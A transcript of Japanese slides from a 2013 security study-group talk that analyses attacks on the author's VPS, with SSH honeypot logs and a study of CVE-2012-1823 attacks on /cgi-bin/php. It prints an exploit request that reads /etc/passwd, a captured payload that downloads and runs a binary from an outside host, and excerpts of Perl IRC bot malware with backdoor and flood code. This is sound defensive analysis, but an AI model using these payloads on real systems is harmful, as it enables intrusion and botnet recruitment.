SlideShare uma empresa Scribd logo
1 de 49
Baixar para ler offline
さくらのVPSに来る悪い人
を観察する その2
Security Casual Talks すみだセキュリティ勉強会その2
2013/12/07 @ozuma5119
2013-11-18 20:12:18 login attempt [root/12345] failed
2013-11-18 20:12:21 login attempt [root/1qazxsw23edc] failed
2013-11-18 20:12:25 login attempt [root/Passw0rd] failed
2013-11-18 20:12:28 login attempt [root/password0] failed
2013-11-18 20:12:32 login attempt [root/password1] failed
176.223.62.254 - - [23/Nov/2013:12:44:01 +0900] "POST /cgibin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63
%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%6
4%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%
69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73
%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+
%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F
%6E%65+%2D%64+%61%75%74%6F%5F
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

1
自己紹介
• @ozuma5119
• ネット企業でセキュリティサービスをやっ
ているエンジニア
• http://d.hatena.ne.jp/ozuma/
• 科学写真家(と名乗っている)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

2
話すことの概要
• 個人で借りているさくらのVPSにいろいろ
来るので、その攻撃を観察してみた
• 悪いことしてる人たちがどうしようとし
ているかが、なんとなくかいま見えた。
ので誰かに言いたくなった
– ボットネット。

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

3
ボットネット?

「ボットネットからの保護」http://www.microsoft.com/ja-jp/security/pc-security/botnet.aspx より引用
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

4
きょう、話さないこと
• セキュアなプログラミング手法とか
• セキュアなサーバ構築の手順とか
– そういうのは教科書的なものがいっぱいある
ので、まぁここで話さなくてもいいかな、と
……

• 教科書
– LPIC Linuxセキュリティ標準教科書(無料)
• http://www.lpi.or.jp/linuxtext/security.shtml

– IPA 「安全なウェブサイトの作り方」(無料)
• https://www.ipa.go.jp/security/vuln/websecurity.html

– 徳丸浩「体系的に学ぶ 安全なWebアプリケー
ションの作り方」
• http://www.amazon.co.jp/dp/4797361190

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

5
こんなん見ました・その1
• SSH (Secure Shell)
– 安全にリモートコンピュータと通信するため
のプロトコル

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

6
こんなん見ました・その1
• なんかVPS(仮想専用サーバ)借りるとsshロ
グインがいっぱい来るんですけど。
– SSHブルートフォースの観察
– 侵入した人が打とうとしているコマンド調べ
– 日本初!(たぶん世界初)。侵入者にアンケート
を取ってみました

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

7
sshd
• ssh接続のためにsshdを上げていると、世
界中から招かれざる客が来ます

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

8
/var/log/secure
Aug 19 21:56:35 sshd[4331]: Failed password for root from 1..
Aug 19 21:56:38 sshd[4335]: Failed password for root from 1..
Aug 19 21:56:42 sshd[4339]: Failed password for root from 1..
Aug 19 21:56:47 sshd[4343]: Failed password for root from 1..
Aug 19 21:56:51 sshd[4347]: Failed password for root from 1..
Aug 19 21:56:56 sshd[4351]: Failed password for root from 1..
Aug 19 21:57:00 sshd[4355]: Failed password for root from 1..
Aug 19 21:57:05 sshd[4359]: Failed password for root from 1..
Aug 19 21:57:09 sshd[4363]: Failed password for root from 1..
Aug 19 21:57:12 sshd[4367]: Failed password for root from 1..

Shit! (クソっ
たれが!)
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

9
sshアタック多すぎるので少しデー
タ取ってみる
• 興味として、どこから、どんなIDやパス
ワードが試されているのか知りたい。
– /var/log/secureには、入れられたパスワードは
出ないのでハニーポットソフトを使います

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

10
sshアタック多すぎるので少しデー
タ取ってみる 2
• 悪い人たちは、ログインできたら次に何
をしようとしているのか知りたい。
– 観察記だし。

• 「悪とは何か?」「正義とは何か?」は難
しいので今はパスします
– 妻を人質にとられて、泣く泣くsshアタック
している人がいるかもしれない(いないだろ
うけど)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

11
kippo – SSH Honeypot

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

12
kippo – SSH Honeypot
• sshdっぽく振る舞ってくれるハニーポット

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

13
kippo – SSH Honeypot 2
• ログ取りして観察できる様々な機能
– 入力されたID・パスワード取得
– ダミーユーザはテキストファイルで簡単追加
– 端末で打たれたコマンドは全てログ取得し、
付属アプリで「再生」可能(おもしろ)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

14
やられサーバ構成
• さくらのVPS
– 49.212.197.88

• sshd
– tcp/2222 (kippo)
– tcp/20222 (sshd)
– tcp/22からtcp/2222
へiptablesでポート
フォワード
– 10月下旬から11月
30日までのデータ
取得

さくらインターネット公式ブログより引用
http://sakuraha-blog.jp/

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

15
まずはログイン分析
2013-11-21 07:02:31+0900 [SSHService ssh-userauth on
HoneyPotTransport,13,218.68.3.136] login attempt
[root/root123] failed
2013-11-21 07:02:33+0900 [SSHService ssh-userauth on
HoneyPotTransport,14,218.68.3.136] login attempt
[root/112233] failed
2013-11-21 07:02:40+0900 [SSHService ssh-userauth on
HoneyPotTransport,15,218.68.3.136] login attempt
[root/123123] failed
2013-11-21 07:02:45+0900 [SSHService ssh-userauth on
HoneyPotTransport,16,218.68.3.136] login attempt
[root/zaq1xsw2] failed

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

16
ssh狙われるアカウント TOP5
1位 2位 3位 4位
5位
root ftpuser oracle nagios postgresql
65.8% 1.3%
1.1% 0.65%
0.55%
総試行:14646

• rootが絶大な人気。(まだ) oracleも多い
• 最近はnagios(サーバ監視ソフト)も目立つ
– この辺のアカウントは/sbin/nologinでログイン
不可にしておいていいはず

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

17
ssh試されたパスワード TOP5
1位

2位
3位
4位
5位
passwo 1qaz2w p@ssw
123456
111111
rd
sx
0rd
0.91% 0.68% 0.45% 0.40% 0.38%
総試行:14646

• まんべんなく試されているので突出した
ものはない。
• こういうのを蓄積すれば、「狙われやす
いパスワード」が分かってくる
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

18
sshソースIPアドレス(国別)
1位

2位

3位

4位

5位

中国 アメリカ メキシコ 韓国 ドイツ
54.6%

13.7%

10.8%

5.8%

4.6%
総試行:14646

• まぁだいたい妥当なランキング
• メキシコが多いのは、10/23の1日だけ猛烈
なアタックがあったから……
– 普段は滅多に来ない国です。たまたま。ア
ミーゴ。
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

19
もっと面白いモノを見る
• Kippoには、侵入者がどんなコマンドを
打ったのかログを取り、あとで再生でき
る機能があります
– キーボード打つ際の、待ち時間なども全てそ
のまま再現してくれるのでリアルです

• ということでちょっと鑑賞してみましょ
う

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

20
It's show time!

http://youtu.be/gp3SBjZNWHU

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

21
ツッコミタイム
• 最初にwコマンドは基本
• apt-get install yum が斬新すぎてウケる
• そもそもrootじゃないのに何故apt-get
installできると思うのか
• エディタはnanoじゃなくてvi使おう
• Ray.txtはPerlスクリプトなのかPHPスクリ
プトなのかどっちだよ

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

22
Ray.txt
#!/usr/bin/perl

#####################################################
#####################################################
## DDoS Perl IrcBot v1.0 / 2012 by RAYDENNN Security Team
##
Stealth MultiFunctional IrcBot writen in Perl
##
Teste on every system with PERL instlled
##
## This is a free program used on your own risk.
##
Created for educational purpose only.
## I'm not responsible for the illegal use of this program.
#####################################################
## [ Channel ] #################### [ Flood ] #############
#####################################################
## !u @join <#channel>
## !u @udp1 <ip> <port> <
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)
## !u @part <#channel>
## !u @udp2 <ip> <packet 23
仕掛けようとしていたモノ
• eggdrop
– IRC bot

• Ray.txt
– DDoS Perl IRCbot

• psyBNC
– IRCサーバへのリレー(中継)ソフト

• どれもボットネット関係

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

24
ssh 侵入者に人気のコマンド
• sshハニーポットを立てていると、侵入者
が最初に打つコマンドはダントツで w

※ wって草生やしてるわけじゃないよ、念のため
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

25
kippoのwコマンドを差し替え
• kippoのソースをいじって、wコマンドで
アンケートに協力してよ!と出すことに
した
srvapl001:/$ w
Hi! I conduct a suvey of SSH honeypot.
Please give me a hand to collect data. :-)

どこの国?

1st question)
Where are you from? (China,Russia,Romania,.. etc.):
2nd question)
What your nickname? :
Thanks!

お名前は?

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

26
アンケートに回答してくれた人
• 1名いました!
• 悪い人とコミュニケーションが取れた!

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

27
srvapl001:/$ w
Hi! I conduct a suvey of SSH honeypot.
Please give me a hand to collect data. :-)
1st question)
Where are you from? (China,Russia,Romania,.. etc.):
Romania
2nd question)
What your nickname? : Romania
Thanks!

• ルーマニアから来たRomaniaさん
– キー入力の反応速度から見て、ちゃんとこの
アンケート文を見て答えてくれたようです
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

28
こんなん見ました・その1
完
その2に続く

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

29
こんなん見ました・その2
• 最近よく見る /cgi-bin/php へのアタック
94.xx.xx.xx - - [20/Nov/2013:11:47:22 +0900] "POST /cgibin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63
%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%6
4%65%3D%6F%66%66+%2D%64+%73%75%68%6F
(省略)
%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6
E%76%3D%30+%2D%6E HTTP/1.1" 500 613 "-" "-"

↓ これ

POST /cgi-bin/php?%2D%64+.......
みなさん来ていますか? 来ていませんか?
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

30
復習:CGI版PHPの仕組み
• Apacheの場合
1. /usr/bin/php-cgi へのシンボリックリンクを、
/var/www/cgi-bin/php に作る
2. .phpファイルにハンドラを設定
3. ハンドラのActionとして/cgi-bin/php を設定

AddHandler php-script .php
Action php-script /cgi-bin/php
httpd.conf

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

31
CGI版PHPの仕組み その2
• サーバ上の.phpファイルがアクセスされ
ると、/cgi-bin/php を裏で実行する
• ユーザからのアクセスで直接/cgi-bin/php
が叩かれることは無い
– が、叩くことはできてしまう

– 叩いたところでエラーになるだけなので無意
味(だったのだが……)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

32
ここでCVE-2012-1823 脆弱性
• 以下のような感じのPOSTを投げつけるだ
けで、お好きなPHPスクリプトをサーバ上
で実行させることができる(CGI版PHP)
POST /myapp.php?-d allow_url_include=on
-d auto_prepend_file=php://input HTTP/1.0
<?php
readfile('/etc/passwd');
?>
参考URL
http://blog.tokumaru.org/2012/05/php-cgi-remote-scripting-cve-2012-1823.html
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

33
CVE-2012-1823脆弱性を利用した新しい攻撃手
法

http://blog.tokumaru.org/2013/11/apache-magica-attack.html
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

より引用

34
魔法少女アパッチ☆マギカ攻撃
はどこが新しくて危険か
• 今まで見つかっていたCGI版PHPの脆弱性
は、サーバ上に設置したPHPスクリプトを
ターゲットとしていた(例:index.php)
– つまりPHPインストールしただけでPHPスク
リプトを置いていないサーバは実質無害だっ
た
– この攻撃は /cgi-bin/php を直接狙うため、PHP
をインストールしてるだけで被害を受ける

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

35
全てをURLエンコード(ログ検知避け?)
84.xx.xx.xx - - [14/Nov/2013:09:16:48 +0900] "POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+
%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63
%6C%75%64%65%3D%6F%6E+%2D

/cgi-bin/php?より後をURLエンコード

85.xx.xx.xx - - [15/Nov/2013:20:21:15 +0900] "POST /cgibin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6
C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D
%64+%73%61%66%65

必要最低限だけURLエンコード (COOL!)

192.xx.xx.xx - - [23/Nov/2013:19:15:41 +0900] "GET /cgibin/php?-d+allow_url_include%3Don+d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+d+
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

36
Magica攻撃を観察:リクエスト
のURL差
• 大きく分けて3パターン (犯行グループごと
に違うのか?)
1. 全てをURLエンコード(ログ検知避け?)
2. /cgi-bin/php?より後をURLエンコード
3. 必要最低限だけURLエンコード (COOLだね!)

• URLが微妙に違うので単純に/cgi-bin/php
だけgrepしてると検知できない

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

37
攻撃を食らうとどうなるのか
• POSTボディ部を見れば、何をされそうに
なったかはすぐ分かる
• ボットを仕込まれ、C&Cサーバに接続
– バックドア付き

• いろんなのが降ってきたのだけど、全部
紹介するととても時間足りないので、1つ
の事例をかいつまんで紹介します

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

38
150.162.19.45 - - [13/Nov/2013:07:23:27 +0900]
"POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D
%(省略)%75%74+%2D%6E HTTP/1.1" 500 602 "-"
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
<? system("cd /tmp ; wget 207.56.197.8/lol ; curl -O
207.56.197.8/lol; fetch 207.56.197.8/lol ; chmod +x
lol ; ./lol ; rm -rf lol "); ?>

150.162.19.45
Universidade Federal de Santa Catarina(ブラ
ジル)
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)
39
リクエストBODY
<? system("cd /tmp ;
wget 207.56.197.8/lol ;
curl -O 207.56.197.8/lol;
fetch 207.56.197.8/lol ;
chmod +x lol ;
./lol ;
rm -rf lol ");
?>

207.56.197.8
NTT America,
Inc.(US)

lolというプログラムを実行するようだ。
(lolとはスラングで、日本語に訳せば「ワロスww」

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

40
lolスクリプトの動作
• 試しにwgetしてみて中を見てみた
• Perl製のShellBOTという名前(そう書いてあ
る)
• IRCでC&Cサーバに接続して、
– 命令を受けてポートスキャンしたり
– 命令を受けてDoS攻撃をしたり
– バックドアを開いたり

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

41
#!/usr/bin/perl
#
# ShellBOT by: devil__
#
Greetz: Puna, Kelserific
#
# Comandos:
#
@oldpack <ip> <bytes> <tempo>;
#
@udp <ip> <porta> <tempo>;
#
@fullportscan <ip> <porta inicial> <porta final>;
#
@conback <ip> <porta>
#
@download <url> <arquivo a ser salvo>;
#
!estatisticas <on/off>;
#
!sair para finalizar o bot;
#
!novonick para trocar o nick do bot por um novo aleatorio;
#
!entra <canal> <tempo>
#
!sai <canal> <tempo>;
#
!pacotes <on/off>
#
@info
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)
42
lolスクリプトの中身
$servidor='suoraphp.upol.cz' unless $servidor;
my $porta='3303';
my @canais=("#aiurea");
my @adms=("w","r");

• C&Cサーバは .cz :チェコ共和国
• 最近、ルーマニアとか東欧の悪い人たち
の活動が活発です(いろいろと。状況証
拠しかまだ無いんだけど……)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

43
lolスクリプトの中身2
ポートスキャン
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("21","22","23","25","53","59","79","80","110"
,"113","135","139","443","445","1025","5000","6660","
6661","6662","6663","6665","6666","6667","6668","66
69","7000","8080","8018");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

44
lolスクリプトの中身3 バックドア
elsif ($funcarg =~ /^conbacks+(.*)s+(d+)/) {
...
(省略)
...
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}

• Windows/UNIX両対応です
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

45
lolスクリプトの中身4 DoS攻撃

elsif ($funcarg =~ /^udps+(.*)s+(d+)s+(d+)/) {
...
(省略)
...
while (($pacota == "1")) {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) an
$pacotese++;
• Windows/UNIX両対応
}
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

46
C&Cサーバの中

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

47
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

48
すみだセキュリティ勉強会

http://ozuma.sakura.ne.jp/sumida/

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

49

Mais conteúdo relacionado

Mais procurados

ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptxネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptxShota Shinogi
 
暗号技術の実装と数学
暗号技術の実装と数学暗号技術の実装と数学
暗号技術の実装と数学MITSUNARI Shigeo
 
分散システムの限界について知ろう
分散システムの限界について知ろう分散システムの限界について知ろう
分散システムの限界について知ろうShingo Omura
 
雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニングyoku0825
 
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」Takuto Wada
 
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Akihiro Suda
 
目grep入門 +解説
目grep入門 +解説目grep入門 +解説
目grep入門 +解説murachue
 
Serf / Consul 入門 ~仕事を楽しくしよう~
Serf / Consul 入門 ~仕事を楽しくしよう~Serf / Consul 入門 ~仕事を楽しくしよう~
Serf / Consul 入門 ~仕事を楽しくしよう~Masahito Zembutsu
 
VPS借りたけどセキュリティが心配! 初心者が気をつけたいセキュリティの話
VPS借りたけどセキュリティが心配! 初心者が気をつけたいセキュリティの話VPS借りたけどセキュリティが心配! 初心者が気をつけたいセキュリティの話
VPS借りたけどセキュリティが心配! 初心者が気をつけたいセキュリティの話Takashi Uemura
 
Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版Masahito Zembutsu
 
Linux女子部 systemd徹底入門
Linux女子部 systemd徹底入門Linux女子部 systemd徹底入門
Linux女子部 systemd徹底入門Etsuji Nakai
 
Where狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキーWhere狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキーyoku0825
 
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!mosa siru
 
エンジニアなら知っておきたい「仮想マシン」のしくみ v1.1 (hbstudy 17)
エンジニアなら知っておきたい「仮想マシン」のしくみ v1.1 (hbstudy 17)エンジニアなら知っておきたい「仮想マシン」のしくみ v1.1 (hbstudy 17)
エンジニアなら知っておきたい「仮想マシン」のしくみ v1.1 (hbstudy 17)Takeshi HASEGAWA
 

Mais procurados (20)

ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptxネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
 
Go入門
Go入門Go入門
Go入門
 
Glibc malloc internal
Glibc malloc internalGlibc malloc internal
Glibc malloc internal
 
入門 シェル実装
入門 シェル実装入門 シェル実装
入門 シェル実装
 
暗号技術の実装と数学
暗号技術の実装と数学暗号技術の実装と数学
暗号技術の実装と数学
 
分散システムの限界について知ろう
分散システムの限界について知ろう分散システムの限界について知ろう
分散システムの限界について知ろう
 
雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング
 
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
 
WebSocket / WebRTCの技術紹介
WebSocket / WebRTCの技術紹介WebSocket / WebRTCの技術紹介
WebSocket / WebRTCの技術紹介
 
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
 
Docker Compose 徹底解説
Docker Compose 徹底解説Docker Compose 徹底解説
Docker Compose 徹底解説
 
目grep入門 +解説
目grep入門 +解説目grep入門 +解説
目grep入門 +解説
 
Serf / Consul 入門 ~仕事を楽しくしよう~
Serf / Consul 入門 ~仕事を楽しくしよう~Serf / Consul 入門 ~仕事を楽しくしよう~
Serf / Consul 入門 ~仕事を楽しくしよう~
 
VPS借りたけどセキュリティが心配! 初心者が気をつけたいセキュリティの話
VPS借りたけどセキュリティが心配! 初心者が気をつけたいセキュリティの話VPS借りたけどセキュリティが心配! 初心者が気をつけたいセキュリティの話
VPS借りたけどセキュリティが心配! 初心者が気をつけたいセキュリティの話
 
Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版
 
Linux女子部 systemd徹底入門
Linux女子部 systemd徹底入門Linux女子部 systemd徹底入門
Linux女子部 systemd徹底入門
 
Where狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキーWhere狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキー
 
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!
 
エンジニアなら知っておきたい「仮想マシン」のしくみ v1.1 (hbstudy 17)
エンジニアなら知っておきたい「仮想マシン」のしくみ v1.1 (hbstudy 17)エンジニアなら知っておきたい「仮想マシン」のしくみ v1.1 (hbstudy 17)
エンジニアなら知っておきたい「仮想マシン」のしくみ v1.1 (hbstudy 17)
 
ヤフー社内でやってるMySQLチューニングセミナー大公開
ヤフー社内でやってるMySQLチューニングセミナー大公開ヤフー社内でやってるMySQLチューニングセミナー大公開
ヤフー社内でやってるMySQLチューニングセミナー大公開
 

Semelhante a さくらのVPSに来る悪い人を観察する その2

とある受託ベンダの開発環境
とある受託ベンダの開発環境とある受託ベンダの開発環境
とある受託ベンダの開発環境Tomoki Hasegawa
 
ロボットシステム学2015年第8回
ロボットシステム学2015年第8回ロボットシステム学2015年第8回
ロボットシステム学2015年第8回Ryuichi Ueda
 
イベント会場ネットワーク
イベント会場ネットワークイベント会場ネットワーク
イベント会場ネットワークFumihisa Shigekane
 
A story of porting OpenBSD/luna88k
A story of porting OpenBSD/luna88kA story of porting OpenBSD/luna88k
A story of porting OpenBSD/luna88kKenji Aoyama
 

Semelhante a さくらのVPSに来る悪い人を観察する その2 (6)

とある受託ベンダの開発環境
とある受託ベンダの開発環境とある受託ベンダの開発環境
とある受託ベンダの開発環境
 
ロボットシステム学2015年第8回
ロボットシステム学2015年第8回ロボットシステム学2015年第8回
ロボットシステム学2015年第8回
 
Open VZ
Open VZOpen VZ
Open VZ
 
イベント会場ネットワーク
イベント会場ネットワークイベント会場ネットワーク
イベント会場ネットワーク
 
Ingress on GKE/GCE
Ingress on GKE/GCEIngress on GKE/GCE
Ingress on GKE/GCE
 
A story of porting OpenBSD/luna88k
A story of porting OpenBSD/luna88kA story of porting OpenBSD/luna88k
A story of porting OpenBSD/luna88k
 

Último

PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000Shota Ito
 
20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directoryosamut
 
プレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツールプレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツールsugiuralab
 
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。iPride Co., Ltd.
 
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ       2024/04/12の勉強会で発表されたものです。新人研修のまとめ       2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。iPride Co., Ltd.
 
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptxIoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptxAtomu Hidaka
 
プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価sugiuralab
 

Último (7)

PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000
 
20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory
 
プレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツールプレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツール
 
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
 
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ       2024/04/12の勉強会で発表されたものです。新人研修のまとめ       2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
 
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptxIoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
 
プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価
 

さくらのVPSに来る悪い人を観察する その2